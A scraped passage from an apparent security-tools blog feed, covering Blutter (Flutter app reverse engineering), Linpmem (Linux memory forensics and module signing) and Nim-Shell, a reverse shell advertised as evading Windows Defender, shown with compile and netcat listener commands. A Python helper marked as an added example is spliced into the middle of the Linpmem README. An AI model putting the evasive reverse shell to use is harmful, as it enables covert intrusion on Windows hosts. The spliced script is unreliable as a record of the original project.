style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/josh0xA/Pantheon" rel="nofollow" target="_blank" title="Download Pantheon">Download Pantheon</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-49260557703718246712023-12-26T08:30:00.000-03:002023-12-26T08:30:00.137-03:00Blutter - Flutter Mobile Application Reverse Engineering Tool<div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidYuhjCM7NAF2rGB8-Xdky3n7100X9ILzInvyw88fO-rWx6KAPv3ZAT2rINyQHcB65R4SspEjrwwyUIUR2KPbK0URI89ulDwcMDEUaVwb_eMlPspM0mCd2C26JFYe8RqeMLP_DmdAXc2WSfVGKSUOZClXbDbACBRK-IDOcNoEf2Xdvm1OHCnu0Zf6NNW1p/s1792/Blutter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidYuhjCM7NAF2rGB8-Xdky3n7100X9ILzInvyw88fO-rWx6KAPv3ZAT2rINyQHcB65R4SspEjrwwyUIUR2KPbK0URI89ulDwcMDEUaVwb_eMlPspM0mCd2C26JFYe8RqeMLP_DmdAXc2WSfVGKSUOZClXbDbACBRK-IDOcNoEf2Xdvm1OHCnu0Zf6NNW1p/w640-h366/Blutter.png" width="640" /></a></div><p><br /></p> <p dir="auto">Flutter Mobile Application <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" target="_blank" title="Reverse Engineering">Reverse Engineering</a> Tool by Compiling Dart AOT Runtime</p> <p dir="auto">Currently, the application supports only Android libapp.so (arm64 only). Also, the application currently works only against recent Dart versions.</p> <p dir="auto">For high priority missing features, see <a href="https://github.com/worawit/blutter#todo" rel="nofollow" target="_blank" title="TODO">TODO</a></p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Environment Setup</h2> <p dir="auto">This application uses the C++20 formatting library. 
It requires a very recent C++ <a href="https://www.kitploit.com/search/label/Compiler" target="_blank" title="compiler">compiler</a> such as g++>=13 or Clang>=15.</p> <p dir="auto">I recommend using a Linux OS (only tested on Debian sid/trixie) because it is easy to set up.</p> <h3 dir="auto" tabindex="-1">Debian Unstable (gcc 13)</h3> <ul dir="auto"> <li>Install build tools and dependencies</li> </ul> <div><pre><code>apt install python3-pyelftools python3-requests git cmake ninja-build \<br /> build-essential pkg-config libicu-dev libcapstone-dev<br /></code></pre></div> <h3 dir="auto" tabindex="-1">Windows</h3> <ul dir="auto"> <li>Install git and python 3</li> <li>Install latest Visual Studio with "Desktop development with C++" and "C++ CMake tools"</li> <li>Install required libraries (libcapstone and libicu4c)</li> </ul> <div><pre><code>python scripts\init_env_win.py<br /></code></pre></div> <ul dir="auto"> <li>Start "x64 Native Tools Command Prompt"</li> </ul> <h3 dir="auto" tabindex="-1">macOS Ventura (clang 15)</h3> <ul dir="auto"> <li>Install XCode</li> <li>Install clang 15 and required tools</li> </ul> <div><pre><code>brew install llvm@15 cmake ninja pkg-config icu4c capstone<br />pip3 install pyelftools requests<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">Extract the "lib" <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> from the apk file</p> <div><pre><code>python3 blutter.py path/to/app/lib/arm64-v8a out_dir<br /></code></pre></div> <p dir="auto">blutter.py automatically detects the Dart version from the Flutter engine and calls the blutter executable for that version to extract the information from libapp.so.</p> <p dir="auto">If the blutter executable for the required Dart version does not exist, the script automatically checks out the Dart source code and compiles it.</p> <h2 dir="auto" tabindex="-1">Update</h2> <p dir="auto">You can use <code>git pull</code> to update and run blutter.py with 
the <code>--rebuild</code> option to force a rebuild of the executable</p> <div><pre><code>python3 blutter.py path/to/app/lib/arm64-v8a out_dir --rebuild<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Output files</h2> <ul dir="auto"> <li><strong>asm/*</strong> libapp <a href="https://www.kitploit.com/search/label/Assemblies" target="_blank" title="assemblies">assemblies</a> with symbols</li> <li><strong>blutter_frida.js</strong> the frida script template for the target application</li> <li><strong>objs.txt</strong> complete (nested) dump of Objects from the Object Pool</li> <li><strong>pp.txt</strong> all Dart objects in the Object Pool</li> </ul> <h2 dir="auto" tabindex="-1">Directories</h2> <ul dir="auto"> <li><strong>bin</strong> contains blutter executables for each Dart version in "blutter_dartvm<ver>_<os>_<arch>" format</li> <li><strong>blutter</strong> contains the source code; it needs to be built against the Dart VM library</li> <li><strong>build</strong> contains build projects which can be deleted after finishing the build process</li> <li><strong>dartsdk</strong> contains the checkout of the Dart Runtime which can be deleted after finishing the build process</li> <li><strong>external</strong> contains 3rd party libraries for Windows only</li> <li><strong>packages</strong> contains the static libraries of the Dart Runtime</li> <li><strong>scripts</strong> contains <a href="https://www.kitploit.com/search/label/Python%20Scripts" target="_blank" title="python scripts">python scripts</a> for getting/building Dart</li> </ul> <h2 dir="auto" tabindex="-1">Generating Visual Studio Solution for Development</h2> <p dir="auto">I use Visual Studio to develop Blutter on Windows. 
The <code>--vs-sln</code> option can be used to generate a Visual Studio solution.</p> <div><pre><code>python blutter.py path\to\lib\arm64-v8a build\vs --vs-sln<br /></code></pre></div> <h2 dir="auto" tabindex="-1">TODO</h2> <ul dir="auto"> <li>More code analysis <ul dir="auto"> <li>Function arguments and return type</li> <li>Some pseudo code for code patterns</li> </ul> </li> <li>Generate better Frida script <ul dir="auto"> <li>More internal classes</li> <li>Object modification</li> </ul> </li> <li>Obfuscated app (still missing many functions)</li> <li>Reading iOS binary</li> <li>Input as apk or ipa</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/worawit/blutter" rel="nofollow" target="_blank" title="Download Blutter">Download Blutter</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-58558857672420664422023-12-21T08:30:00.001-03:002023-12-21T08:30:00.246-03:00Linpmem - A Physical Memory Acquisition Tool For Linux<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU88JYCLtHU7jCBmaWLCv3frl18MUaf3X7W_S8ocss7Vxvhm7JDU8-4zv3AvMKJpRox4kX9UhCmHWn20G1DhIjYEEUH5y8Zl7MgURGLycQxM3lRcEtcELqRKv2v9DI3w0AFJpk9lKoW4BltwWtZ2ZKTekKJru7sMuiQf-QhZIjtFAnQIdslfXZrQsU72v9/s1792/Linpmem.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU88JYCLtHU7jCBmaWLCv3frl18MUaf3X7W_S8ocss7Vxvhm7JDU8-4zv3AvMKJpRox4kX9UhCmHWn20G1DhIjYEEUH5y8Zl7MgURGLycQxM3lRcEtcELqRKv2v9DI3w0AFJpk9lKoW4BltwWtZ2ZKTekKJru7sMuiQf-QhZIjtFAnQIdslfXZrQsU72v9/w640-h366/Linpmem.png" width="640" /></a></div><p style="text-align: center;"><br /></p><p dir="auto">Like its Windows counterpart, <a href="https://github.com/Velocidex/WinPmem" 
rel="nofollow" target="_blank" title="Winpmem">Winpmem</a>, this is not a traditional memory dumper. Linpmem offers an API for reading from <em>any</em> physical address, including <em>reserved memory</em> and <em>memory holes</em>, but it can also be used for normal memory dumping. Furthermore, the driver offers a variety of access modes to read physical memory, such as byte, word, dword, qword, and buffer access mode, where buffer access mode is appropriate in most standard cases. If reading requires an aligned byte/word/dword/qword read, Linpmem will do precisely that.</p> <p dir="auto">Currently, Linpmem offers the following features:</p> <ol dir="auto"> <li>Read from physical address (access mode byte, word, dword, qword, or buffer)</li> <li>CR3 info service (specify target process by pid)</li> <li>Virtual to physical address translation service</li> </ol> <p dir="auto">Cache control is to be added in the future to support the specialized read access modes.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Building the kernel driver</h2> <p dir="auto"><em>At least for now</em>, you must compile the Linpmem driver yourself. A method to load a precompiled Linpmem driver on other Linux systems is currently under work, but not finished yet. That said, compiling the Linpmem driver is not difficult; it basically amounts to running 'make'.</p> <h3 dir="auto" tabindex="-1">Step 1 - getting the right headers</h3> <p dir="auto">You need <code>make</code> and a C compiler. (We recommend gcc, but clang should work as well.)</p> <p dir="auto">Make sure that you have the <code>linux-headers</code> installed (using whatever package manager your target Linux distro has). The exact package name may vary on your distribution. 
A quick (distro-independent) way to check if you have the package installed:</p> <div><pre><code>ls -l /usr/lib/modules/`uname -r`/<br /></code></pre></div> <p dir="auto">That's it, you can proceed to step 2.</p> <p dir="auto"><strong>Foreign system:</strong> <em>Currently</em>, if you want to compile the driver for <em>another</em> system, e.g., because you want to create a memory dump but can't compile on the target, you have to download the header package directly from the package <a href="https://www.kitploit.com/search/label/Repositories" target="_blank" title="repositories">repositories</a> of that system's Linux distribution. Double-check that the package version <em>exactly</em> matches the release and kernel version running on the foreign system. In case the other system is using a self-compiled kernel, you have to obtain a copy of that kernel's build directory. Then, place the location of either directory in the <code>KDIR</code> environment variable.</p> <div><pre><code>export KDIR=path/to/extracted/header/package/or/kernel/root<br /></code></pre></div> <h3 dir="auto" tabindex="-1">Step 2 - make</h3> <p dir="auto">Compiling the driver is simple, just type:</p> <div><pre><code>make<br /></code></pre></div> <p dir="auto">This should produce <code>linpmem.ko</code> in the current working directory.</p> <p dir="auto">You might want to check <code>precompiler.h</code> before building and choose whether to compile for release or debug (e.g., with debug printing). There aren't many other precompiler settings right now.</p> <h2 dir="auto" tabindex="-1">Loading The Driver</h2> <p dir="auto">The linpmem.ko module can be loaded by using <code>insmod path-to-linpmem.ko</code>, and unloaded with <code>rmmod path-to-linpmem.ko</code>. (This will load the driver only for this uptime.) 
If you compiled for debug, also take a look at dmesg.</p> <p dir="auto">After loading, you need to create the device node in order to talk to the driver:</p> <div><pre><code>mknod /dev/linpmem c 42 0<br /></code></pre></div> <p dir="auto">If you can't talk to the driver, check the dmesg log to verify that '42' was indeed the registered major:</p> <div><pre><code>[12827.900168] linpmem: registered chrdev with major 42<br /></code></pre></div> <p dir="auto">Usually, though, the kernel will actually assign this requested number.</p> <p dir="auto">You can use <code>chown</code> on the device to give it to your user, if you do not want to have a root console open all the time. (Or just keep using it in a root console.)</p> <ul dir="auto"> <li>Watch dmesg output. Please report errors if you see any!</li> <li>Warning: if there is a dmesg error print from Linpmem telling you to reboot, better do it immediately.</li> <li>Warning: this is an early version.</li> </ul> <h2 dir="auto" tabindex="-1">Usage</h2> <h3 dir="auto" tabindex="-1">Demo Code</h3> <p dir="auto">There is example code demonstrating and explaining (in detail) how to interact with the driver. The user-space API reference can furthermore be found in <code>./userspace_interface/linpmem_shared.h</code>.</p> <ol dir="auto"> <li><code>cd demo</code></li> <li><code>gcc -o test test.c</code></li> <li><code>(sudo) ./test</code> (you need sudo if you did not use chown on the device)</li> </ol> <p dir="auto">This code is important if you want to understand how to directly interact with the driver instead of using a <a href="https://github.com/Velocidex/Linpmem#libraries" rel="nofollow" target="_blank" title="library">library</a>. It can also be used as a short function test.</p> <h3 dir="auto" tabindex="-1">Command Line Interface Tool</h3> <p dir="auto">There is an (optional) basic <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> interface tool to Linpmem, the <em>pmem CLI tool</em>. 
It can be found here: <a href="https://github.com/vobst/linpmem-cli" rel="nofollow" target="_blank" title="https://github.com/vobst/linpmem-cli">https://github.com/vobst/linpmem-cli</a>. Aside from the source code, there is also a precompiled CLI tool as well as the precompiled static library and headers that can be found <a href="https://github.com/vobst/linpmem-cli/releases/" rel="nofollow" target="_blank" title="here">here</a> (signed). Note: this is a preliminary version, be sure to check for updates, as many additions and enhancements will follow soon.</p> <p dir="auto">The pmem CLI tool can be used for testing the various functions of Linpmem in a (relatively) safe and convenient manner. Linpmem can also be loaded by this tool instead of using insmod/rmmod, with some extra options in future. This also has the advantage that pmem auto-creates the right device for you for immediate use. It is extremely portable and runs on any Linux system (and, in fact, has been tested even on a Linux 2.6).</p> <div><pre><code>$ ./pmem -h<br />Command-line client for the linpmem driver<br /><br />Usage: pmem [OPTIONS] [COMMAND]<br /><br />Commands:<br /> insmod Load the linpmem driver<br /> help Print this message or the help of the given subcommand(s)<br /><br />Options:<br /> -a, --address <ADDRESS> Address for physical read operations<br /> -v, --virt-address <VIRT_ADDRESS> Translate address in target process' address space (default: current process)<br /> -s, --size <SIZE> Size of buffer read operations<br /> -m, --mode <MODE> Access mode for read operations [possible values: byte, word, dword, qword, buffer]<br /> -p, --pid <PID> Target process for cr3 info and virtual-to-physical translations<br /> --cr3 Query cr3 value of target process (default: current process)<br /> --verbose Display debug output<br /> -h, --help Print help (see more with '--help')<br /> -V, --version Print version<br /></code></pre></div> <p dir="auto">If you want to compile the cli tool yourself, 
change to its directory and follow the instructions in the (cli) Readme to build it. Otherwise, just download the prebuilt program; it should work on <em>any</em> Linux. To load the <a href="https://www.kitploit.com/search/label/Kernel%20Driver" target="_blank" title="kernel driver">kernel driver</a> with the cli tool:</p> <div><pre><code># pmem insmod path/to/linpmem.ko<br /></code></pre></div> <p dir="auto">The advantage of using the pmem tool to load the driver is that you do not have to create the device file yourself, and it will offer (in future releases) to choose who owns the linpmem device.</p> <h3 dir="auto" tabindex="-1">Libraries</h3> <p dir="auto">The <a href="https://github.com/Velocidex/Linpmem#command-line-interface-tool" rel="nofollow" target="_blank" title="pmem command line interface">pmem command line interface</a> is only a thin wrapper around a small Rust library that exposes an API for interfacing with the driver. More advanced users can also use this library directly. The library is automatically compiled (as a static, portable library) along with the pmem cli tool when compiling from <a href="https://github.com/vobst/linpmem-cli" rel="nofollow" target="_blank" title="https://github.com/vobst/linpmem-cli">https://github.com/vobst/linpmem-cli</a>, but is also included (precompiled) <a href="https://github.com/vobst/linpmem-cli/releases/" rel="nofollow" target="_blank" title="here">here</a> (signed). Note: this is a preliminary version; more to follow soon.</p> <p dir="auto">If you do not want to use the usermode library and prefer to interface with the driver directly on your own, you can find its user-space API/interface and documentation in <code>./userspace_interface/linpmem_shared.h</code>. 
We also provide example code in <code>demo/test.c</code> that explains how to use the driver directly.</p> <h3 dir="auto" tabindex="-1">Memdumping tool</h3> <p dir="auto">Not implemented yet.</p> <h2 dir="auto" tabindex="-1">Tested Linux Distributions</h2> <ul dir="auto"> <li>Debian, self-compiled 6.4.X, Qemu/KVM, not paravirtualized. <ul dir="auto"> <li>PTI: off/on</li> </ul> </li> <li>Debian 12, Qemu/KVM, fully paravirtualized. <ul dir="auto"> <li>PTI: on</li> </ul> </li> <li>Ubuntu server, Qemu/KVM, not paravirtualized. <ul dir="auto"> <li>PTI: on</li> </ul> </li> <li>Fedora 38, Qemu/KVM, fully paravirtualized. <ul dir="auto"> <li>PTI: on</li> </ul> </li> <li>Baremetal Linux test, AMI BIOS: Linux 6.4.4 <ul dir="auto"> <li>PTI: on</li> </ul> </li> <li>Baremetal Linux test, HP: Linux 6.4.4 <ul dir="auto"> <li>PTI: on</li> </ul> </li> <li>Baremetal, Arch[-hardened], Dell BIOS, Linux 6.4.X</li> <li>Baremetal, Debian, 6.1.X</li> <li>Baremetal, Ubuntu 20.04 with Secure Boot on. Works, but <a href="https://github.com/Velocidex/Linpmem#handling-secure-boot" rel="nofollow" target="_blank" title="sign">sign</a> driver first.</li> <li>Baremetal, Ubuntu 22.04, Linux 6.2.X</li> </ul> <h2 dir="auto" tabindex="-1">Handling Secure Boot</h2> <p dir="auto">If the system reports the following error message when loading the module, it might be because of secure boot:</p> <div><pre><code>$ sudo insmod linpmem.ko<br />insmod: ERROR: could not insert module linpmem.ko: Operation not permitted<br /></code></pre></div> <p dir="auto">There are different ways to still load the module. The obvious one is to disable secure boot in your UEFI settings.</p> <p dir="auto">If your distribution supports it, a more elegant solution would be to sign the module before using it. 
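</p> <p dir="auto">Two of the manual steps in this README are easy to get wrong under time pressure: the <code>mknod</code> line in "Loading The Driver" hard-codes major 42, and a module prepared for a Secure Boot host must actually carry a signature before you need it. The following Python script is an added example (it is not part of Linpmem or the pmem CLI) that reads the major the driver really registered from <code>/proc/devices</code> or from its dmesg line, creates the device node from that value, and checks a <code>.ko</code> for the kernel's signature trailer and the SecureBoot EFI variable. It assumes the driver registers its character device under the name <code>linpmem</code>, as its dmesg message suggests; everything else it reads is standard kernel interface.</p>

```python
"""Linpmem pre-deployment checks (added example; not part of the Linpmem project).

Covers two README steps: finding the major number the driver actually
registered (instead of hard-coding 42 in mknod) and checking, ahead of an
incident, that the .ko you plan to load on a Secure Boot host is signed.
Assumption: the driver registers its chrdev under the name "linpmem".
"""
import os
import re
import stat

DRIVER_NAME = "linpmem"          # assumption, see module docstring
DEVICE_PATH = "/dev/linpmem"
SECUREBOOT_EFIVAR = "/sys/firmware/efi/efivars/SecureBoot-8be4df61-93ca-11d2-aa0d-00e098032b8c"
# scripts/sign-file appends exactly this trailer to a signed module.
MODULE_SIG_TRAILER = b"~Module signature appended~\n"
# Matches the line Linpmem prints: "[12827.900168] linpmem: registered chrdev with major 42"
DMESG_RE = re.compile(r"linpmem: registered chrdev with major (\d+)")


def major_from_proc_devices(text, name=DRIVER_NAME):
    """Return the major of character device `name` from /proc/devices text, or None.

    /proc/devices lists "<major> <name>" pairs under "Character devices:" and
    again under "Block devices:"; only the character section is searched.
    """
    in_char_section = False
    for line in text.splitlines():
        if line.startswith("Character devices:"):
            in_char_section = True
            continue
        if line.startswith("Block devices:"):
            break
        fields = line.split()
        if in_char_section and len(fields) == 2 and fields[1] == name and fields[0].isdigit():
            return int(fields[0])
    return None


def major_from_dmesg(text):
    """Return the major from the driver's dmesg registration line, or None."""
    match = DMESG_RE.search(text)
    return int(match.group(1)) if match else None


def device_node_command(major, path=DEVICE_PATH):
    """The equivalent mknod command, for logging or review before running it."""
    return f"mknod {path} c {major} 0"


def create_device_node(major, path=DEVICE_PATH, mode=0o600):
    """Create the character device node (needs root); same effect as device_node_command."""
    os.mknod(path, mode | stat.S_IFCHR, os.makedev(major, 0))


def module_is_signed(ko_bytes):
    """True if a module image ends with the kernel's signature trailer.

    This only proves a signature is attached, not that the signing key is
    enrolled as a MOK on the target; that enrollment still has to be done there.
    """
    return ko_bytes.endswith(MODULE_SIG_TRAILER)


def secure_boot_enabled(efivar_bytes):
    """Decode the SecureBoot variable as read from efivarfs.

    efivarfs prepends 4 bytes of variable attributes; the SecureBoot value
    itself is one byte, 1 when enforcement is on.
    """
    return len(efivar_bytes) >= 5 and efivar_bytes[4] == 1


def readiness_report(proc_devices_text, ko_bytes, efivar_bytes=None):
    """Combine the checks into a dict a runbook can act on."""
    major = major_from_proc_devices(proc_devices_text)
    return {
        "major": major,
        "mknod": device_node_command(major) if major is not None else None,
        "module_signed": module_is_signed(ko_bytes),
        "secure_boot": secure_boot_enabled(efivar_bytes) if efivar_bytes is not None else None,
    }


if __name__ == "__main__":
    import sys
    ko_path = sys.argv[1] if len(sys.argv) > 1 else "linpmem.ko"
    with open("/proc/devices") as f:
        devices = f.read()
    with open(ko_path, "rb") as f:
        ko = f.read()
    efivar = None
    if os.path.exists(SECUREBOOT_EFIVAR):
        with open(SECUREBOOT_EFIVAR, "rb") as f:
            efivar = f.read()
    report = readiness_report(devices, ko, efivar)
    print(report)
    if report["major"] is not None and not os.path.exists(DEVICE_PATH):
        create_device_node(report["major"])   # run as root after insmod
        print("created", DEVICE_PATH)
```

<p dir="auto">Run it as root on the host after loading the module; the parsing functions take plain text or bytes, so the same checks can be applied to <code>/proc/devices</code>, dmesg output or a <code>.ko</code> copied from a target machine. If <code>module_signed</code> is false and <code>secure_boot</code> is true, the module will be rejected with the "Operation not permitted" error shown above.</p> <p dir="auto">Signing the module requires a Machine Owner Key (MOK) that is enrolled in the firmware. 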
This can be done using the following steps (tested on Ubuntu 20.04).</p> <ol dir="auto"> <li>Install mokutil: <div><pre><code>$ sudo apt install mokutil<br /></code></pre></div> </li> <li>Create the signing key material: <div><pre><code>$ openssl req -new -x509 -newkey rsa:4096 -keyout mok-signing.key -out mok-signing.crt -outform DER -days 365 -nodes -subj "/CN=Some descriptive name/"<br /></code></pre></div> Make sure to adjust the options to your needs. In particular, consider the key length (-newkey), the validity (-days), the option to set a key pass phrase (-nodes; leave it out if you want to set a pass phrase), and the common name to include in the certificate (-subj).</li> <li>Register the new MOK: <div><pre><code>$ sudo mokutil --import mok-signing.crt<br /></code></pre></div> You will be asked for a password, which is required in the following step. Consider using a password that you can type on a US keyboard layout.</li> <li>Reboot the system. It will enter a MOK enrollment menu. Follow the instructions to enroll your new key.</li> <li>Sign the module. Once the MOK is enrolled, you can sign your module with the key and certificate created in step 2: <div><pre><code>$ /usr/src/linux-headers-$(uname -r)/scripts/sign-file sha256 path/to/mok-signing.key path/to/mok-signing.crt path/to/linpmem.ko<br /></code></pre></div> </li> </ol> <p dir="auto">After that, you should be able to load the module.</p> <p dir="auto">Note that from a forensic-readiness perspective, you should prepare a signed module <strong>before</strong> you need it, as the system will reboot twice during the process described above, destroying most of your volatile data in memory.</p> <h2 dir="auto" tabindex="-1">Known Issues</h2> <ul dir="auto"> <li>Huge page read is not implemented. Linpmem recognizes a huge page and rejects the read, for now.</li> <li>Reading from mapped I/O and DMA space will be done with CPU caching enabled.</li> <li>No locks are taken during the page table walk. 
This might lead to inconsistent results when concurrent modifications are going on. This is a general (and mostly unsolvable) problem of live RAM reading without halting the entire OS.</li> <li>Secure Boot (Ubuntu): please <a href="https://github.com/Velocidex/Linpmem#handling-secure-boot" rel="nofollow" target="_blank" title="sign">sign</a> your driver prior to use.</li> <li>Any CPU-based memory encryption, e.g., AMD SME, Intel SGX/TDX, ...</li> <li>Pluton chips?</li> </ul> <p dir="auto">(Please report potential issues if you encounter anything.)</p> <h2 dir="auto" tabindex="-1">Work in progress</h2> <ul dir="auto"> <li>Loading a precompiled driver on any Linux.</li> <li>Processor cache control. Example: for uncached reading of mapped I/O and DMA space.</li> </ul> <h2 dir="auto" tabindex="-1">Future work</h2> <ul dir="auto"> <li>Arm/MIPS support (far future work).</li> <li>Legacy kernels (such as 2.6), Unix-based kernels.</li> </ul> <h2 dir="auto" tabindex="-1">Acknowledgements</h2> <p dir="auto"><a href="https://github.com/Velocidex/Linpmem" rel="nofollow" target="_blank" title="Linpmem">Linpmem</a>, as well as <a href="https://github.com/Velocidex/WinPmem" rel="nofollow" target="_blank" title="Winpmem">Winpmem</a>, would not exist without the work of our predecessors in the (now retired) REKALL project: <a href="https://github.com/google/rekall" rel="nofollow" target="_blank" title="https://github.com/google/rekall">https://github.com/google/rekall</a>.</p> <ul dir="auto"> <li>We would like to thank Mike Cohen and Johannes Stüttgen for their pioneering work and open source contribution on PTE remapping, a technique that is still in use 10 years later.</li> </ul> <p dir="auto">Our open source contributors:</p> <ul dir="auto"> <li>Viviane Zwanger</li> <li>Valentin Obst</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Velocidex/Linpmem" rel="nofollow" target="_blank"
title="Download Linpmem">Download Linpmem</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-68604702070080608192023-12-16T08:30:00.006-03:002023-12-16T08:30:00.136-03:00Nim-Shell - Reverse Shell That Can Bypass Windows Defender Detection<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjA4OOLyqJOKkIzObBgTKvN9pXfBYPf_s_giBmPdyHwBKL1OMfJrbAo5DMmgSUkUxZbwtAxXyV4TxUhgCtPU4nzJoC0xbLJltrgrtZBb5opuht8FmNB4uVe7Zdw_aMA4ZMCb5I30JbSRMizQpHIHehlCviTJBf2LFUbxT4jfoaJVAhZWCPYMo8gKzihgG-H"><img alt="" border="0" height="192" id="BLOGGER_PHOTO_ID_7308983051732476274" src="https://blogger.googleusercontent.com/img/a/AVvXsEjA4OOLyqJOKkIzObBgTKvN9pXfBYPf_s_giBmPdyHwBKL1OMfJrbAo5DMmgSUkUxZbwtAxXyV4TxUhgCtPU4nzJoC0xbLJltrgrtZBb5opuht8FmNB4uVe7Zdw_aMA4ZMCb5I30JbSRMizQpHIHehlCviTJBf2LFUbxT4jfoaJVAhZWCPYMo8gKzihgG-H=w640-h192" width="640" /></a></p><div><br /></div> <p dir="auto">Reverse shell that can bypass <a href="https://www.kitploit.com/search/label/Windows%20Defender" target="_blank" title="windows defender">windows defender</a> detection</p><span><a name='more'></a></span><p dir="auto"><br /></p> <div><pre><code>$ apt install nim<br /></code></pre></div> <h1 dir="auto" tabindex="-1">Compilation</h1> <p dir="auto">nim c -d:mingw --app:gui nimshell.nim</p> <p dir="auto" style="text-align: center;"><a href="https://github.com/emrekybs/nim-shell/blob/main/1.png" rel="nofollow" target="_blank" title="Reverse shell that can bypass windows defender detection (3)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjA4OOLyqJOKkIzObBgTKvN9pXfBYPf_s_giBmPdyHwBKL1OMfJrbAo5DMmgSUkUxZbwtAxXyV4TxUhgCtPU4nzJoC0xbLJltrgrtZBb5opuht8FmNB4uVe7Zdw_aMA4ZMCb5I30JbSRMizQpHIHehlCviTJBf2LFUbxT4jfoaJVAhZWCPYMo8gKzihgG-H"><img alt="" border="0" height="192" id="BLOGGER_PHOTO_ID_7308983051732476274" 
src="https://blogger.googleusercontent.com/img/a/AVvXsEjA4OOLyqJOKkIzObBgTKvN9pXfBYPf_s_giBmPdyHwBKL1OMfJrbAo5DMmgSUkUxZbwtAxXyV4TxUhgCtPU4nzJoC0xbLJltrgrtZBb5opuht8FmNB4uVe7Zdw_aMA4ZMCb5I30JbSRMizQpHIHehlCviTJBf2LFUbxT4jfoaJVAhZWCPYMo8gKzihgG-H=w640-h192" width="640" /></a></p> <p dir="auto">Change the IP address and port number you want to listen to in the nimshell.nim file according to your device.</p> <p dir="auto" style="text-align: center;"><a href="https://github.com/emrekybs/nim-shell/blob/main/2.png" rel="nofollow" target="_blank" title="Reverse shell that can bypass windows defender detection (4)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEirE2jlCWOsiiK0tmCnN24MtHWXS-INsTNAbbUBXN30MXcYBPgGA4l4qiBB-4yexv1Vv7YSp8iOliPbPwxA_g76HokZjXmyXkHqDRTd63b9Q4wjKFNHJv9tmJlO68jeNt110_QBhbtAC_FqenkUKSRU-QAfvHzIuHDvDEL7Y6osNMF3yxbfDQHUKLT4dWoM"><img alt="" border="0" height="284" id="BLOGGER_PHOTO_ID_7308983073899144738" src="https://blogger.googleusercontent.com/img/a/AVvXsEirE2jlCWOsiiK0tmCnN24MtHWXS-INsTNAbbUBXN30MXcYBPgGA4l4qiBB-4yexv1Vv7YSp8iOliPbPwxA_g76HokZjXmyXkHqDRTd63b9Q4wjKFNHJv9tmJlO68jeNt110_QBhbtAC_FqenkUKSRU-QAfvHzIuHDvDEL7Y6osNMF3yxbfDQHUKLT4dWoM=w640-h284" width="640" /></a></p> <h1 dir="auto" tabindex="-1">and listen</h1> <div><pre><code> $ nc -nvlp 4444<br /></code></pre></div> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/emrekybs/nim-shell" rel="nofollow" target="_blank" title="Download Nim-Shell">Download Nim-Shell</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-3655731829596651402023-12-11T08:30:00.001-03:002023-12-11T08:30:00.126-03:00Douglas-042 - Powershell Script To Help Speed Up Threat Hunting Incident Response Processes<p style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEh87xJjzyBL9Nfn-L1sLThip0y8letsw6mpq_GvAMnoBsWTWZkhIw9fjnuEsNU0sB88mL3sSW_mY7OS2t01LSY1uRyOTZ3_orVdIHjG95JqtgSn04lrB4w6-KynDLgAes-XzMzgr_ZMyQlrorFALv8AvFtUBLjhsl8soPah5NxFY0hrjGY_ltr2Vjrix7zn"><img alt="" border="0" height="394" id="BLOGGER_PHOTO_ID_7308982525197249218" src="https://blogger.googleusercontent.com/img/a/AVvXsEh87xJjzyBL9Nfn-L1sLThip0y8letsw6mpq_GvAMnoBsWTWZkhIw9fjnuEsNU0sB88mL3sSW_mY7OS2t01LSY1uRyOTZ3_orVdIHjG95JqtgSn04lrB4w6-KynDLgAes-XzMzgr_ZMyQlrorFALv8AvFtUBLjhsl8soPah5NxFY0hrjGY_ltr2Vjrix7zn=w400-h394" width="400" /></a></p> <p dir="auto"><br /></p><p dir="auto">DOUGLAS-042 is a PowerShell script designed to speed up the triage process and to collect crucial evidence from both forensic artifacts and volatile data. Its main purpose is to help pinpoint potential security breaches within <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> environments. With a focus on speed, DOUGLAS-042 prioritizes and aggregates the data so that no vital piece of information escapes scrutiny when investigating a possible compromise. The collected data is stored in a text file named after the host system's hostname. 
